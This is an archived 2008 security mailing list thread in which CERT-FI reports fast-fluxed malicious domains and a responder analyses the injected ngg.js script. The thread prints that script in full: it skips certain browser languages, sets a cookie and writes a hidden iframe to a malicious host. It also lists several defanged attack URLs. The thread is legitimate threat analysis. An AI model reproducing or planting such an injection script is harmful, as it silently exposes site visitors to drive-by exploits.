[nsp-sec] Nasty fast-fluxed sites containing javascript malcode [FICORA #183472]

Fri Jul 11 05:06:39 EDT 2008

Ngg.js according to the code
________________________________________
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(
n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://destbnp.com/cgi-bin/index.cgi?ad width=0
height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

________________________________________

1.not vulnerable to CN,TW,RU,KO..
2.other country will go into if statement, read cookie value"updngg", if
exists, will do nothing.. (it only effect the first time browsing users, and
the cookie period is 11 hr)
We think this is to prevent analysis or some trigger condition.
3.condition meets then it will connect to the malicious iframe link.

And We think these hackers don't want to become a global threats , because
if it does, every security company will try to solve the sites,
The other possibility is that many they have a uniq 0day exploit but
targeting specified language version.
That's why they use language to identify users 

Regards,
Alan Lee

-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Huopio Kauto
Sent: Friday, July 11, 2008 4:13 PM
To: nsp-security at puck.nether.net
Subject: [nsp-sec] Nasty fast-fluxed sites containing javascript malcode
[FICORA #183472]

----------- nsp-security Confidential --------

Hi folks,

The following URL:s relate to a javascript that we found
in a finnish website. Very fresh domain registrations
and heavily fast-fluxed. Any analysis?

Takedown of the domains and sites etc is more than welcome

> > hxxp://bkpadd.mobi/cgi-bin/index.cgi?ad
> > hxxp://usaadw.com/cgi-bin/index.cgi?ad
> > hxxp://drvadw.com/cgi-bin/index.cgi?ad
> > hxxp://adwnetw.com/cgi-bin/index.cgi?ad
> > hxxp://loopadd.com/cgi-bin/index.cgi?ad

This seems to be related with SQL injection attacks and
ngg.js. Just google ngg.js..

--Kauto

Kauto Huopio - kauto.huopio at ficora.fi
Senior information security adviser
Finnish Communications Regulatory Authority  / CERT-FI
tel. +358-9-6966772, fax +358-9-6966515, mobile +358-50-5826131
CERT-FI watch desk daytime: +358-9-6966510
CERT-FI 24/7 on-call duty officer: +358-44-0120123 / http://www.cert.fi

_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________